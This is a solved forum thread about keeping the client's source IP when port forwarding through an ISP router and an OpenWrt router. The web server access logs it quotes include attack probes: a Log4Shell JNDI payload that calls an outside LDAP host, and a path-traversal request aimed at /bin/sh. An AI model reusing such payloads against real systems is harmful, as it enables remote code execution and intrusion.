[Solved] Port forward with keep ip source

Hi,

I have a similar problem of Need original source IP on forwarded traffic but I didn't found a solution in the topic.

My network config :

  • ISP Router : Mode router 192.168.1.254 set to forward port to my OpenWRT
  • Open WRT : 192.168.1.1 set to forward port to my server
  • Server : 192.168.1.23 receive connexion

When my router was my default gateway, i just need to make a port forward from my ISP router to my server and the source ip is keeped

When the OpenWRT is the default gateway, previous rules doesn't work anymore...
So I set the two forwarding rules, so it worked but I lost ip source.

167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "-"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "PRI * HTTP/2.0" 400 154 "-" "-"
124.223.101.87 - - [06/Mar/2022:10:43:50 +0000] "GET / HTTP/1.1" 444 0 "-" "/${jndi:ldap://185.203.118.200:1389/Exploit}"
62.233.50.179 - - [06/Mar/2022:10:46:12 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:11:09:32 +0000] "GET /console/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.218.143 - - [06/Mar/2022:11:39:10 +0000] "GET /actuator/health HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
45.146.165.37 - - [06/Mar/2022:12:23:31 +0000] "GET /_ignition/execute-solution HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.162 - - [06/Mar/2022:13:08:23 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.146.165.37 - - [06/Mar/2022:13:25:03 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
89.248.165.24 - - [06/Mar/2022:14:02:39 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:14:55:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 154 "-" "-"
66.249.76.50 - - [06/Mar/2022:15:20:52 +0000] "GET /robots.txt HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.146.165.37 - - [06/Mar/2022:16:07:06 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.94.93.3 - - [06/Mar/2022:16:15:48 +0000] "GET /admin/config.php HTTP/1.1" 400 252 "-" "gbrmss/7.29.0"
176.58.109.214 - - [06/Mar/2022:16:30:44 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
207.46.13.95 - - [06/Mar/2022:16:51:13 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
172.105.89.161 - - [06/Mar/2022:16:51:49 +0000] "GET /0bef HTTP/1.0" 400 252 "-" "-"
40.77.167.65 - - [06/Mar/2022:17:08:34 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.241.218.78 - - [06/Mar/2022:17:19:35 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:37 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:38 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:55:55 +0000] "+\xF0\xBB\xD2\x19\xFD\x11\xDE\x0B\x87\x04\x81\xFDz\xF6s\xEFl\xE9e" 400 154 "-" "-"
192.168.1.1 - - [07/Mar/2022:11:57:23 +0000] "GET / HTTP/1.1" 500 174 "-" "libwww-perl/6.61"
192.168.1.1 - - [07/Mar/2022:12:24:26 +0000] "GET / HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.168.1.1 - - [07/Mar/2022:12:51:14 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:52 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "GET /text4041646657511 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "POST /sdk HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:54 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /evox/about HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /HNAP1 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:52:19 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:52:21 +0000] "GET /favicon.ico HTTP/1.1" 500 174 "-" "curl/7.75.0"


Is the good thing to make 2 port forward ?
Can allow traffic between wan and my server directly ?
How can I keep the source IP ?

Thanks for help

Since they're in the same network, the main router should be forwarding directly to the server on its LAN. The OpenWrt router really isn't routing anything here, it is not part of the connection from the Internet to the server.

Internet -> (your public IP on the 192.168.1.254 router) -> 192.168.1.23

The packet arriving at 192.168.1.23 will have the Internet user's IP as its source address. The server will send a response to the Internet at this address, which should be forwarded as the default gateway through the 192.168.1.254 router.

2 Likes

Force the gateway 192.168.1.254 to my server solve my problem.

The solution was easy :sweat_smile:

Thanks

This topic was automatically closed 10 days after the last reply. New replies are no longer allowed.